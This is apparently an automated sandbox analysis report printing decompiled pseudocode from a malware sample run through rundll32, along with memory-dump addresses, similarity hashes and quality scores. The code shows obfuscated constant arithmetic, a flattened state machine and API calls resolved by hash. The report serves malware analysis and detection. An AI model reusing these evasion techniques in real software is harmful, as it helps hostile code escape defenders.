                                                                                                                                  				_v324 = _v324 ^ 0x1744d618;
                                                                                                                                  				_v324 = _v324 ^ 0x1766082c;
                                                                                                                                  				_v400 = 0xe6723b;
                                                                                                                                  				_v400 = _v400 ^ 0x220d80d9;
                                                                                                                                  				_v400 = _v400 ^ 0x0161a8c1;
                                                                                                                                  				_v400 = _v400 ^ 0x238d1a3c;
                                                                                                                                  				_v376 = 0xaaa6;
                                                                                                                                  				_v376 = _v376 + 0xd31a;
                                                                                                                                  				_v376 = _v376 + 0xfffff53b;
                                                                                                                                  				_v376 = _v376 ^ 0x00079406;
                                                                                                                                  				_v452 = 0xe6cc76;
                                                                                                                                  				_v452 = _v452 ^ 0xa4c29e28;
                                                                                                                                  				_v452 = _v452 / _t602;
                                                                                                                                  				_v452 = _v452 ^ 0x123fe3c8;
                                                                                                                                  				_v520 = 0x822cac;
                                                                                                                                  				_v520 = _v520 / _t678;
                                                                                                                                  				_v520 = _v520 << 4;
                                                                                                                                  				_v520 = _v520 << 9;
                                                                                                                                  				_v520 = _v520 ^ 0x2c5f9d39;
                                                                                                                                  				_v440 = 0xafb195;
                                                                                                                                  				_v440 = _v440 + 0xffff123a;
                                                                                                                                  				_v440 = _v440 >> 0xa;
                                                                                                                                  				_v440 = _v440 ^ 0x0003dc41;
                                                                                                                                  				_v448 = 0xdf86e4;
                                                                                                                                  				_v448 = _v448 ^ 0xac60bb5d;
                                                                                                                                  				_v448 = _v448 ^ 0x5238faed;
                                                                                                                                  				_v448 = _v448 ^ 0xfe8be764;
                                                                                                                                  				_v336 = 0x3e14c9;
                                                                                                                                  				_v336 = _v336 << 7;
                                                                                                                                  				_v336 = _v336 ^ 0x1f0fc953;
                                                                                                                                  				_v496 = 0x4885f3;
                                                                                                                                  				_v496 = _v496 * 0x25;
                                                                                                                                  				_v496 = _v496 + 0x3aa8;
                                                                                                                                  				_v496 = _v496 + 0xffff73aa;
                                                                                                                                  				_v496 = _v496 ^ 0x0a7b30ee;
                                                                                                                                  				_v480 = 0xca6b34;
                                                                                                                                  				_v480 = _v480 >> 9;
                                                                                                                                  				_v480 = _v480 + 0xfb6a;
                                                                                                                                  				_v480 = _v480 / _t692;
                                                                                                                                  				_v480 = _v480 ^ 0x000164ed;
                                                                                                                                  				_v432 = 0xb19133;
                                                                                                                                  				_t679 = 0x63;
                                                                                                                                  				_t693 = _v296;
                                                                                                                                  				_v432 = _v432 * 0x53;
                                                                                                                                  				_v432 = _v432 >> 0x10;
                                                                                                                                  				_v432 = _v432 ^ 0x00018cb4;
                                                                                                                                  				_v328 = 0xdb466c;
                                                                                                                                  				_t603 = _v296;
                                                                                                                                  				_v328 = _v328 / _t679;
                                                                                                                                  				_v328 = _v328 ^ 0x000e2190;
                                                                                                                                  				_v488 = 0xd48740;
                                                                                                                                  				_t680 = 0x44;
                                                                                                                                  				_v488 = _v488 * 7;
                                                                                                                                  				_v488 = _v488 * 0x66;
                                                                                                                                  				_v488 = _v488 + 0x34f;
                                                                                                                                  				_v488 = _v488 ^ 0x50c19e73;
                                                                                                                                  				_v424 = 0xacfab2;
                                                                                                                                  				_v424 = _v424 / _t680;
                                                                                                                                  				_v424 = _v424 | 0xedf008b5;
                                                                                                                                  				_v424 = _v424 ^ 0xedf22909;
                                                                                                                                  				_v472 = 0x2e74a8;
                                                                                                                                  				_v472 = _v472 * 0x3f;
                                                                                                                                  				_v472 = _v472 ^ 0x6424471f;
                                                                                                                                  				_v472 = _v472 >> 0xb;
                                                                                                                                  				_v472 = _v472 ^ 0x0009d0c0;
                                                                                                                                  				_v416 = 0x7e19d4;
                                                                                                                                  				_v416 = _v416 << 0xd;
                                                                                                                                  				_v416 = _v416 + 0x1081;
                                                                                                                                  				_v416 = _v416 ^ 0xc3344569;
                                                                                                                                  				_v464 = 0xa74bb7;
                                                                                                                                  				_v464 = _v464 >> 0xb;
                                                                                                                                  				_v464 = _v464 + 0x9c4;
                                                                                                                                  				_v464 = _v464 >> 6;
                                                                                                                                  				_v464 = _v464 ^ 0x000976a8;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t551 = 0xf168e34;
                                                                                                                                  					do {
                                                                                                                                  						while(1) {
                                                                                                                                  							L2:
                                                                                                                                  							_t698 = _t686 - 0x7498ebf;
                                                                                                                                  							if(_t698 > 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							if(_t698 == 0) {
                                                                                                                                  								_push(_v496);
                                                                                                                                  								_push(_v336);
                                                                                                                                  								_push(_v448);
                                                                                                                                  								_t580 = E002D7F1D(_v480, _t603, _v432, E002E8606(_v440, 0x2d1560, __eflags), _v328, _v292 - _t603, _v488);
                                                                                                                                  								E002DA8B0(_v424, _t577, _v472);
                                                                                                                                  								_t582 = _v296;
                                                                                                                                  								 *_t582 = _t693;
                                                                                                                                  								_t582[1] = _t603 + _t580 - _t693;
                                                                                                                                  								goto L29;
                                                                                                                                  							}
                                                                                                                                  							if(_t686 == 0x488924) {
                                                                                                                                  								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                                  								_push(_t610);
                                                                                                                                  								_push(_t610);
                                                                                                                                  								_t693 = E002D7FF2(_t682);
                                                                                                                                  								__eflags = _t693;
                                                                                                                                  								_t551 = 0xf168e34;
                                                                                                                                  								_t610 = _v456;
                                                                                                                                  								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t686 == 0x123a276) {
                                                                                                                                  								_push(_v468);
                                                                                                                                  								_push(_v436);
                                                                                                                                  								_t587 = E002EDCF7(_v332, 0x2d15c0, __eflags);
                                                                                                                                  								_push( &_v256);
                                                                                                                                  								_push(_t587);
                                                                                                                                  								_push(_t682);
                                                                                                                                  								_push(_v300);
                                                                                                                                  								 *((intOrPtr*)(E002DA42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                                  								E002DA8B0(_v428, _t587, _v372);
                                                                                                                                  								_t694 =  &(_t694[5]);
                                                                                                                                  								_t686 = 0x488924;
                                                                                                                                  								L12:
                                                                                                                                  								_t610 = _v456;
                                                                                                                                  								while(1) {
                                                                                                                                  									L1:
                                                                                                                                  									_t551 = 0xf168e34;
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							if(_t686 != 0x57ff6e7) {
                                                                                                                                  								if(_t686 == 0x5f676f3) {
                                                                                                                                  									_t598 = E002E0AE0(8, 1);
                                                                                                                                  									_push(_v516);
                                                                                                                                  									_t682 = _t598;
                                                                                                                                  									_push( &_v288);
                                                                                                                                  									_push(_t682);
                                                                                                                                  									_push(9);
                                                                                                                                  									E002D80E3(_v380, _v484);
                                                                                                                                  									_t686 = 0x7f96e60;
                                                                                                                                  									L11:
                                                                                                                                  									_t694 =  &(_t694[6]);
                                                                                                                                  									goto L12;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t686 != 0x618a3a9) {
                                                                                                                                  										goto L28;
                                                                                                                                  									} else {
                                                                                                                                  										_t686 = 0x5f676f3;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L30:
                                                                                                                                  								return _t595;
                                                                                                                                  							}
                                                                                                                                  							_t682 = 0x4000;
                                                                                                                                  							_push(_t610);
                                                                                                                                  							_push(_t610);
                                                                                                                                  							_t595 = E002D7FF2(0x4000);
                                                                                                                                  							_v300 = _t595;
                                                                                                                                  							__eflags = _t595;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								_t686 = 0x123a276;
                                                                                                                                  								goto L12;
                                                                                                                                  							}
                                                                                                                                  							goto L30;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t686 - 0x7f96e60;
                                                                                                                                  						if(_t686 == 0x7f96e60) {
                                                                                                                                  							_t554 = E002E0AE0(0x10, 4);
                                                                                                                                  							_push(_v396);
                                                                                                                                  							_t682 = _t554;
                                                                                                                                  							_push( &_v128);
                                                                                                                                  							_push(_t682);
                                                                                                                                  							_push(0xb);
                                                                                                                                  							E002D80E3(_v504, _v388);
                                                                                                                                  							_t610 = _v456;
                                                                                                                                  							_t694 =  &(_t694[6]);
                                                                                                                                  							_t686 = 0x8d9b717;
                                                                                                                                  							_t551 = 0xf168e34;
                                                                                                                                  							goto L28;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags = _t686 - 0x8d9b717;
                                                                                                                                  							if(_t686 == 0x8d9b717) {
                                                                                                                                  								_t687 =  &_v256;
                                                                                                                                  								_t659 = E002E0AE0(0x10, 8);
                                                                                                                                  								_t560 = _v308;
                                                                                                                                  								__eflags = _t560 - _t659;
                                                                                                                                  								if(_t560 < _t659) {
                                                                                                                                  									_t675 = _t659 - _t560;
                                                                                                                                  									_t683 = _t687;
                                                                                                                                  									_t634 = _t675 >> 1;
                                                                                                                                  									__eflags = _t634;
                                                                                                                                  									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
                                                                                                                                  									asm("adc ecx, ecx");
                                                                                                                                  									_t687 = _t687 + _t675 * 2;
                                                                                                                                  									memset(_t683 + _t634, _t566, 0);
                                                                                                                                  									_t694 =  &(_t694[6]);
                                                                                                                                  								}
                                                                                                                                  								_t563 = E002E0AE0(0x10, 8);
                                                                                                                                  								_push(_v384);
                                                                                                                                  								_t682 = _t563;
                                                                                                                                  								_push(_t687);
                                                                                                                                  								_push(_t682);
                                                                                                                                  								_push(0xb);
                                                                                                                                  								E002D80E3(_v352, _v340);
                                                                                                                                  								_t686 = 0x57ff6e7;
                                                                                                                                  								goto L11;
                                                                                                                                  							} else {
                                                                                                                                  								__eflags = _t686 - 0xa9d081a;
                                                                                                                                  								if(_t686 == 0xa9d081a) {
                                                                                                                                  									E002DED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
                                                                                                                                  									_t610 = _v456;
                                                                                                                                  									_t694 =  &(_t694[3]);
                                                                                                                                  									_t686 = 0x7498ebf;
                                                                                                                                  									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                                  									goto L1;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t686 - 0xe639f63;
                                                                                                                                  									if(_t686 == 0xe639f63) {
                                                                                                                                  										E002E8519(_v416, _v464, _v300);
                                                                                                                                  										return 0;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t686 - _t551;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										goto L28;
                                                                                                                                  									} else {
                                                                                                                                  										_push(_v476);
                                                                                                                                  										_push(_v420);
                                                                                                                                  										_v292 = _t682 + _t693;
                                                                                                                                  										_push(_v356);
                                                                                                                                  										_t603 = E002EC0C1( &_v128, __eflags,  &_v288, E002E8606(_v492, 0x2d1610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
                                                                                                                                  										E002DA8B0(_v400, _t572, _v376);
                                                                                                                                  										_t694 =  &(_t694[0xd]);
                                                                                                                                  										_t686 = 0xa9d081a;
                                                                                                                                  										goto L12;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L30;
                                                                                                                                  						L28:
                                                                                                                                  						__eflags = _t686 - 0x7bf1275;
                                                                                                                                  					} while (__eflags != 0);
                                                                                                                                  					L29:
                                                                                                                                  					return _v300;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002ef69c
                                                                                                                                  0x002ef6a3
                                                                                                                                  0x002ef6ae
                                                                                                                                  0x002ef6bb
                                                                                                                                  0x002ef6c6
                                                                                                                                  0x002ef6d1
                                                                                                                                  0x002ef6dc
                                                                                                                                  0x002ef6e7
                                                                                                                                  0x002ef6f2
                                                                                                                                  0x002ef6fa
                                                                                                                                  0x002ef705
                                                                                                                                  0x002ef710
                                                                                                                                  0x002ef71b
                                                                                                                                  0x002ef723
                                                                                                                                  0x002ef72e
                                                                                                                                  0x002ef739
                                                                                                                                  0x002ef744
                                                                                                                                  0x002ef74f
                                                                                                                                  0x002ef757
                                                                                                                                  0x002ef765
                                                                                                                                  0x002ef76a
                                                                                                                                  0x002ef76e
                                                                                                                                  0x002ef776
                                                                                                                                  0x002ef77e
                                                                                                                                  0x002ef789
                                                                                                                                  0x002ef793
                                                                                                                                  0x002ef794
                                                                                                                                  0x002ef79b
                                                                                                                                  0x002ef7a6
                                                                                                                                  0x002ef7b1
                                                                                                                                  0x002ef7bc
                                                                                                                                  0x002ef7c7
                                                                                                                                  0x002ef7cf
                                                                                                                                  0x002ef7df
                                                                                                                                  0x002ef7e3
                                                                                                                                  0x002ef7eb
                                                                                                                                  0x002ef7f3
                                                                                                                                  0x002ef7fb
                                                                                                                                  0x002ef800
                                                                                                                                  0x002ef808
                                                                                                                                  0x002ef810
                                                                                                                                  0x002ef818
                                                                                                                                  0x002ef820
                                                                                                                                  0x002ef825
                                                                                                                                  0x002ef82d
                                                                                                                                  0x002ef838
                                                                                                                                  0x002ef840
                                                                                                                                  0x002ef84b
                                                                                                                                  0x002ef856
                                                                                                                                  0x002ef86a
                                                                                                                                  0x002ef871
                                                                                                                                  0x002ef87c
                                                                                                                                  0x002ef887
                                                                                                                                  0x002ef88f
                                                                                                                                  0x002ef897
                                                                                                                                  0x002ef8a2
                                                                                                                                  0x002ef8aa
                                                                                                                                  0x002ef8b7
                                                                                                                                  0x002ef8bb
                                                                                                                                  0x002ef8c3
                                                                                                                                  0x002ef8cb
                                                                                                                                  0x002ef8d3
                                                                                                                                  0x002ef8db
                                                                                                                                  0x002ef8e3
                                                                                                                                  0x002ef8e8
                                                                                                                                  0x002ef8f0
                                                                                                                                  0x002ef8fb
                                                                                                                                  0x002ef903
                                                                                                                                  0x002ef90e
                                                                                                                                  0x002ef919
                                                                                                                                  0x002ef921
                                                                                                                                  0x002ef929
                                                                                                                                  0x002ef930
                                                                                                                                  0x002ef938
                                                                                                                                  0x002ef940
                                                                                                                                  0x002ef947
                                                                                                                                  0x002ef94a
                                                                                                                                  0x002ef94b
                                                                                                                                  0x002ef94f
                                                                                                                                  0x002ef954
                                                                                                                                  0x002ef958
                                                                                                                                  0x002ef960
                                                                                                                                  0x002ef968
                                                                                                                                  0x002ef973
                                                                                                                                  0x002ef97e
                                                                                                                                  0x002ef989
                                                                                                                                  0x002ef99c
                                                                                                                                  0x002ef9a3
                                                                                                                                  0x002ef9ae
                                                                                                                                  0x002ef9b9
                                                                                                                                  0x002ef9c1
                                                                                                                                  0x002ef9c6
                                                                                                                                  0x002ef9ca
                                                                                                                                  0x002ef9cf
                                                                                                                                  0x002ef9d7
                                                                                                                                  0x002ef9e4
                                                                                                                                  0x002ef9e8
                                                                                                                                  0x002ef9ed
                                                                                                                                  0x002ef9f2
                                                                                                                                  0x002ef9fa
                                                                                                                                  0x002efa05
                                                                                                                                  0x002efa10
                                                                                                                                  0x002efa1b
                                                                                                                                  0x002efa26
                                                                                                                                  0x002efa31
                                                                                                                                  0x002efa3c
                                                                                                                                  0x002efa47
                                                                                                                                  0x002efa52
                                                                                                                                  0x002efa5d
                                                                                                                                  0x002efa68
                                                                                                                                  0x002efa73
                                                                                                                                  0x002efa7b
                                                                                                                                  0x002efa8b
                                                                                                                                  0x002efa8f
                                                                                                                                  0x002efa97
                                                                                                                                  0x002efaa7
                                                                                                                                  0x002efaab
                                                                                                                                  0x002efab0
                                                                                                                                  0x002efab5
                                                                                                                                  0x002efabd
                                                                                                                                  0x002efac5
                                                                                                                                  0x002efacd
                                                                                                                                  0x002efad2
                                                                                                                                  0x002efada
                                                                                                                                  0x002efae2
                                                                                                                                  0x002efaea
                                                                                                                                  0x002efaf2
                                                                                                                                  0x002efafa
                                                                                                                                  0x002efb05
                                                                                                                                  0x002efb0d
                                                                                                                                  0x002efb18
                                                                                                                                  0x002efb25
                                                                                                                                  0x002efb29
                                                                                                                                  0x002efb31
                                                                                                                                  0x002efb39
                                                                                                                                  0x002efb41
                                                                                                                                  0x002efb49
                                                                                                                                  0x002efb4e
                                                                                                                                  0x002efb5c
                                                                                                                                  0x002efb62
                                                                                                                                  0x002efb6a
                                                                                                                                  0x002efb79
                                                                                                                                  0x002efb7c
                                                                                                                                  0x002efb83
                                                                                                                                  0x002efb87
                                                                                                                                  0x002efb8c
                                                                                                                                  0x002efb94
                                                                                                                                  0x002efbaa
                                                                                                                                  0x002efbb1
                                                                                                                                  0x002efbb8
                                                                                                                                  0x002efbc3
                                                                                                                                  0x002efbd0
                                                                                                                                  0x002efbd1
                                                                                                                                  0x002efbda
                                                                                                                                  0x002efbde
                                                                                                                                  0x002efbe6
                                                                                                                                  0x002efbee
                                                                                                                                  0x002efc03
                                                                                                                                  0x002efc07
                                                                                                                                  0x002efc0f
                                                                                                                                  0x002efc17
                                                                                                                                  0x002efc24
                                                                                                                                  0x002efc28
                                                                                                                                  0x002efc30
                                                                                                                                  0x002efc35
                                                                                                                                  0x002efc3d
                                                                                                                                  0x002efc45
                                                                                                                                  0x002efc4a
                                                                                                                                  0x002efc52
                                                                                                                                  0x002efc5a
                                                                                                                                  0x002efc62
                                                                                                                                  0x002efc67
                                                                                                                                  0x002efc6f
                                                                                                                                  0x002efc74
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002efc8d
                                                                                                                                  0x002effc3
                                                                                                                                  0x002effcc
                                                                                                                                  0x002effd3
                                                                                                                                  0x002f000b
                                                                                                                                  0x002f001f
                                                                                                                                  0x002f0024
                                                                                                                                  0x002f0030
                                                                                                                                  0x002f0032
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0032
                                                                                                                                  0x002efc99
                                                                                                                                  0x002efdb2

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                                  • API String ID: 0-2624470838
                                                                                                                                  • Opcode ID: 9c60faa29b5313f28e6904689debbc6cd49e102ea6a142edb671135fec6e2c2a
                                                                                                                                  • Instruction ID: f975f0bfbbd97e8958e4e11e775e17d05e6387584047fa2ae970f94e9895bbea
                                                                                                                                  • Opcode Fuzzy Hash: 9c60faa29b5313f28e6904689debbc6cd49e102ea6a142edb671135fec6e2c2a
                                                                                                                                  • Instruction Fuzzy Hash: AE5231725093818FD3B8CF25C58AB8BFBE1BBC4348F50891DE19996260DBB49949CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002DD6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				char _v4;
                                                                                                                                  				char _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr* _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				unsigned int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				intOrPtr _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				intOrPtr _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				intOrPtr _t400;
                                                                                                                                  				void* _t407;
                                                                                                                                  				signed int _t410;
                                                                                                                                  				intOrPtr _t421;
                                                                                                                                  				signed int _t423;
                                                                                                                                  				signed int _t424;
                                                                                                                                  				signed int _t425;
                                                                                                                                  				signed int _t426;
                                                                                                                                  				signed int _t427;
                                                                                                                                  				signed int _t428;
                                                                                                                                  				signed int _t429;
                                                                                                                                  				signed int _t430;
                                                                                                                                  				signed int _t431;
                                                                                                                                  				signed int _t432;
                                                                                                                                  				signed int _t433;
                                                                                                                                  				intOrPtr _t434;
                                                                                                                                  				void* _t473;
                                                                                                                                  				intOrPtr* _t482;
                                                                                                                                  				signed int _t485;
                                                                                                                                  				signed int* _t491;
                                                                                                                                  				void* _t493;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_v16 = __edx;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(__edx);
                                                                                                                                  				_v72 = 0xfd05e7;
                                                                                                                                  				_t491 =  &(( &_v192)[6]);
                                                                                                                                  				_v72 = _v72 | 0xfdc7c414;
                                                                                                                                  				_v72 = _v72 ^ 0xfdffc5f6;
                                                                                                                                  				_t489 = 0;
                                                                                                                                  				_v128 = 0x159cf;
                                                                                                                                  				_t421 = 0;
                                                                                                                                  				_v128 = _v128 + 0x2543;
                                                                                                                                  				_t485 = 0x8939926;
                                                                                                                                  				_v128 = _v128 ^ 0xc1c453fb;
                                                                                                                                  				_v128 = _v128 ^ 0xc1c52ce8;
                                                                                                                                  				_v188 = 0xc0a375;
                                                                                                                                  				_t423 = 0x5a;
                                                                                                                                  				_v188 = _v188 / _t423;
                                                                                                                                  				_v188 = _v188 + 0xf5e3;
                                                                                                                                  				_v188 = _v188 + 0xffffba7d;
                                                                                                                                  				_v188 = _v188 ^ 0x0002d452;
                                                                                                                                  				_v192 = 0xeb0e91;
                                                                                                                                  				_v192 = _v192 << 0xb;
                                                                                                                                  				_v192 = _v192 >> 0xd;
                                                                                                                                  				_v192 = _v192 | 0x4be38997;
                                                                                                                                  				_v192 = _v192 ^ 0x4be25280;
                                                                                                                                  				_v52 = 0x3397e5;
                                                                                                                                  				_v52 = _v52 ^ 0x345a01ed;
                                                                                                                                  				_v52 = _v52 ^ 0x346a35aa;
                                                                                                                                  				_v60 = 0x140ff9;
                                                                                                                                  				_t424 = 6;
                                                                                                                                  				_v60 = _v60 / _t424;
                                                                                                                                  				_v60 = _v60 ^ 0x000ad59a;
                                                                                                                                  				_v168 = 0x6059cb;
                                                                                                                                  				_t425 = 0x1a;
                                                                                                                                  				_v168 = _v168 * 0x7f;
                                                                                                                                  				_v168 = _v168 / _t425;
                                                                                                                                  				_v168 = _v168 * 0x21;
                                                                                                                                  				_v168 = _v168 ^ 0x3ca5e455;
                                                                                                                                  				_v112 = 0x1e6ccd;
                                                                                                                                  				_v112 = _v112 << 0xc;
                                                                                                                                  				_v112 = _v112 + 0xffff3925;
                                                                                                                                  				_v112 = _v112 ^ 0xe6c2746b;
                                                                                                                                  				_v44 = 0xb8d15a;
                                                                                                                                  				_v44 = _v44 >> 0xb;
                                                                                                                                  				_v44 = _v44 ^ 0x0008fc1e;
                                                                                                                                  				_v172 = 0x2478d;
                                                                                                                                  				_v172 = _v172 ^ 0x68bbc6f8;
                                                                                                                                  				_v172 = _v172 >> 0xc;
                                                                                                                                  				_v172 = _v172 | 0x6f66efc5;
                                                                                                                                  				_v172 = _v172 ^ 0x6f64ef75;
                                                                                                                                  				_v116 = 0x51a99f;
                                                                                                                                  				_v116 = _v116 | 0x1f129b6c;
                                                                                                                                  				_v116 = _v116 ^ 0xc118cdce;
                                                                                                                                  				_v116 = _v116 ^ 0xde47442a;
                                                                                                                                  				_v132 = 0x216e1a;
                                                                                                                                  				_v132 = _v132 + 0xffff43fb;
                                                                                                                                  				_v132 = _v132 ^ 0x7008f7db;
                                                                                                                                  				_v132 = _v132 ^ 0x702542ff;
                                                                                                                                  				_v84 = 0xc91edc;
                                                                                                                                  				_t426 = 0x5e;
                                                                                                                                  				_v84 = _v84 / _t426;
                                                                                                                                  				_v84 = _v84 ^ 0x0006a22a;
                                                                                                                                  				_v164 = 0xa7de11;
                                                                                                                                  				_v164 = _v164 + 0xffff6841;
                                                                                                                                  				_v164 = _v164 >> 4;
                                                                                                                                  				_v164 = _v164 << 3;
                                                                                                                                  				_v164 = _v164 ^ 0x005f8816;
                                                                                                                                  				_v108 = 0xdd6066;
                                                                                                                                  				_v108 = _v108 >> 8;
                                                                                                                                  				_v108 = _v108 << 8;
                                                                                                                                  				_v108 = _v108 ^ 0x00d87344;
                                                                                                                                  				_v92 = 0x21cc88;
                                                                                                                                  				_v92 = _v92 ^ 0xd81b96af;
                                                                                                                                  				_v92 = _v92 ^ 0xd8329727;
                                                                                                                                  				_v96 = 0xbd6d4e;
                                                                                                                                  				_t427 = 0x26;
                                                                                                                                  				_v96 = _v96 / _t427;
                                                                                                                                  				_v96 = _v96 ^ 0x00061825;
                                                                                                                                  				_v24 = 0x6502ac;
                                                                                                                                  				_v24 = _v24 << 4;
                                                                                                                                  				_v24 = _v24 ^ 0x065de4e3;
                                                                                                                                  				_v56 = 0x642336;
                                                                                                                                  				_v56 = _v56 + 0xffffd3db;
                                                                                                                                  				_v56 = _v56 ^ 0x006ffb84;
                                                                                                                                  				_v68 = 0x348f1;
                                                                                                                                  				_t428 = 0x55;
                                                                                                                                  				_v68 = _v68 / _t428;
                                                                                                                                  				_v68 = _v68 ^ 0x0008f449;
                                                                                                                                  				_v76 = 0x3c74f1;
                                                                                                                                  				_v76 = _v76 + 0xffff407e;
                                                                                                                                  				_v76 = _v76 ^ 0x003b6445;
                                                                                                                                  				_v88 = 0xc452b0;
                                                                                                                                  				_v88 = _v88 + 0xffff3a6d;
                                                                                                                                  				_v88 = _v88 ^ 0x00c8dd7a;
                                                                                                                                  				_v48 = 0xc68c2;
                                                                                                                                  				_t429 = 0x57;
                                                                                                                                  				_v48 = _v48 / _t429;
                                                                                                                                  				_v48 = _v48 ^ 0x0008f98a;
                                                                                                                                  				_v100 = 0x631361;
                                                                                                                                  				_v100 = _v100 | 0x5af5ab8e;
                                                                                                                                  				_v100 = _v100 ^ 0x5affcbc5;
                                                                                                                                  				_v148 = 0x1761a;
                                                                                                                                  				_v148 = _v148 ^ 0xebf93349;
                                                                                                                                  				_v148 = _v148 >> 4;
                                                                                                                                  				_v148 = _v148 ^ 0x0eb625e6;
                                                                                                                                  				_v40 = 0xe5378a;
                                                                                                                                  				_v40 = _v40 >> 2;
                                                                                                                                  				_v40 = _v40 ^ 0x003c8b43;
                                                                                                                                  				_v140 = 0x73545;
                                                                                                                                  				_t430 = 0x61;
                                                                                                                                  				_v140 = _v140 * 0x21;
                                                                                                                                  				_v140 = _v140 / _t430;
                                                                                                                                  				_v140 = _v140 ^ 0x0002b6d6;
                                                                                                                                  				_v80 = 0x39d04;
                                                                                                                                  				_v80 = _v80 >> 4;
                                                                                                                                  				_v80 = _v80 ^ 0x00009cd0;
                                                                                                                                  				_v156 = 0x1ba0aa;
                                                                                                                                  				_v156 = _v156 + 0x716e;
                                                                                                                                  				_v156 = _v156 << 0xd;
                                                                                                                                  				_v156 = _v156 ^ 0xb6bcbcaf;
                                                                                                                                  				_v156 = _v156 ^ 0x34f57f5f;
                                                                                                                                  				_v20 = 0xda4179;
                                                                                                                                  				_t431 = 0x27;
                                                                                                                                  				_t482 = _v16;
                                                                                                                                  				_v20 = _v20 / _t431;
                                                                                                                                  				_v20 = _v20 ^ 0x00092493;
                                                                                                                                  				_v32 = 0x6dc25;
                                                                                                                                  				_v32 = _v32 >> 0xf;
                                                                                                                                  				_v32 = _v32 ^ 0x0008149e;
                                                                                                                                  				_v180 = 0x3ec4dc;
                                                                                                                                  				_v180 = _v180 >> 5;
                                                                                                                                  				_t432 = 0x70;
                                                                                                                                  				_v180 = _v180 / _t432;
                                                                                                                                  				_v180 = _v180 + 0xffff18e8;
                                                                                                                                  				_v180 = _v180 ^ 0xfff4c632;
                                                                                                                                  				_v64 = 0xea19a3;
                                                                                                                                  				_v64 = _v64 | 0xee52e837;
                                                                                                                                  				_v64 = _v64 ^ 0xeef909eb;
                                                                                                                                  				_v28 = 0xcaf9fa;
                                                                                                                                  				_v28 = _v28 >> 0xe;
                                                                                                                                  				_v28 = _v28 ^ 0x000e6f4e;
